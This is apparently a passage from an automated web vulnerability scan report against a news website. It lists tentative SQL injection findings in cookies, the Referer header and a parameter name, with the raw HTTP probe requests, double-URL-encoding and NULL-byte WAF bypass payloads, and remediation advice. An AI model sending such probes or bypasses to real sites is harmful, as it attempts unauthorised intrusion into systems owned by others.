<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Prosecutors were barred from charging the Rev. Jerome Lindner with child molestation, even ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI''; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/crime-courts/ci_1679 ...[SNIP]...
The __g_c cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_c cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __g_c cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Prosecutors were barred from charging the Rev. Jerome Lindner with child molestation, even ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16792429?source=most_viewed HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0%2527%2527; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/crime-courts/ci_1679 ...[SNIP]...
The UserType cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the UserType cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /crime-courts/ci_16800051 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00'; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='LOS ANGELES -- Authorities say three more people have been arrested for investigation of at ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.p ...[SNIP]...
Request 2
GET /crime-courts/ci_16800051 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser%00''; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/crime-courts/ci_16800051?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:37:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:37:41 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 447
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The __g_u cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __g_u cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00'; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='John Grishams first young adult novel, predictably about a 13-year-old legal beagle wh ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... <a href="http://www.insidebayarea.com/holdays-2009/ci_13866290" target="_blank" style="width:184px">From luxury on the cheap to can't-fail video games</a> ...[SNIP]...
Request 2
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310%00''; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/entertainment/ci_16753906?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:39:40 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:39:40 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The fPage cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the fPage cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00'; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='John Grishams first young adult novel, predictably about a 13-year-old legal beagle wh ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... <a href="http://www.insidebayarea.com/holdays-2009/ci_13866290" target="_blank" style="width:184px">From luxury on the cheap to can't-fail video games</a> ...[SNIP]...
Request 2
GET /entertainment/ci_16753906 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false%00''; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily Server: Apache/2.0.52 (Red Hat) Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/entertainment/ci_16753906?nclick_check=1&forced=true Vary: Accept-encoding Expires: Wed, 08 Dec 2010 06:39:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Wed, 08 Dec 2010 06:39:10 GMT Connection: close Connection: Transfer-Encoding Content-Type: text/html;charset=UTF-8 Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /entertainment/ci_16777054 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The former Pink Floyd leaders $60 million "The Wall Live" tour is every bit as good as ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]... "Wall" are both literally and figuratively put into place. Dealing with his father's death ("The Thin Ice"), an overly protective "Mother," sadistic teachers ("Another Brick in the Wall Part 2") and a failing marriage ("Empty Spaces") are all bricks -- and as he delivers the details in song, a stage crew erects actual bricks onstage. Slowly, but surely, Waters and his crew are blocked from our view.</p> ...[SNIP]...
Request 2
GET /entertainment/ci_16777054 HTTP/1.1 Host: www.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669; Referer: http://www.google.com/search?hl=en&q=''
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/entertainment/ci_167 ...[SNIP]...
1.220. http://www.mercurynews.com/entertainment/ci_16799215 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Tentative
Host: http://www.mercurynews.com
Path: /entertainment/ci_16799215
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /entertainment/ci_16799215?1%2527=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Theyre televisions version of misfit toys: Perfectly sound, high-quality shows th ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /entertainment/ci_16799215?1%2527%2527=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://www.mercurynews.com/entertainment/ci_167 ...[SNIP]...
The Zvents cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Zvents cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /entertainment/ci_16800206 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00'; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Cal Performances announces a revival of Philip Glass seminal opera, Einstein on t ...[SNIP]... g name, server, and channel on the next lines. */
s.pageName=FriendlyName; s.channel="Home"; // Same as prop1 s.server="";// Blank s.pageType=""; // Error pages ONLY
s.prop1="D=g";
s.prop2='D=ch+" / "+c43'; // Sub section 1
s.prop3=""; // Sub sect ...[SNIP]...
Request 2
GET /entertainment/ci_16800206 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4%00''; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
Response 2 (redirected)
HTTP/1.1 302 Moved Temporarily
Server: Apache/2.0.52 (Red Hat)
Location: https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn?url=http://www.mercurynews.com/entertainment/ci_16800206?nclick_check=1&forced=true
Vary: Accept-encoding
Expires: Wed, 08 Dec 2010 06:39:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 06:39:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 448
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="https://secure.passport.mnginteractive.com/mngi ...[SNIP]...
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /giants/ci_16745927?nclick_check=1 HTTP/1.1
Host: www.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: currBrandCheck=mngimercurynews; UserType=Browser; JSESSIONID=4TAEQ3DHPIXDGCUUCBWCFFA; __g_c=w%3A1%7Cb%3A4%7Cc%3A280449122501380%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; s_sq=%5B%5BB%5D%5D'; UserID=CG3BTKSGEWDI4CUUCBWCFFI; fPage=false; u=COOKIE_NAME%3Du%3B280449122501380_1_0.01_0_5_1292194310310%3Dundefined%3BuserIdChange%3Dtrue%3BuserId%3DCG3BTKSGEWDI4CUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dfalse%3BvType%3D2%3BinitRegType%3DVoluntary%3B; s_cc=true; __g_u=280449122501380_1_0.01_0_5_1292194310310; Zvents=hikxwtryu4; fcspersistslider1=1; __qca=P0-326766520-1291762315669;
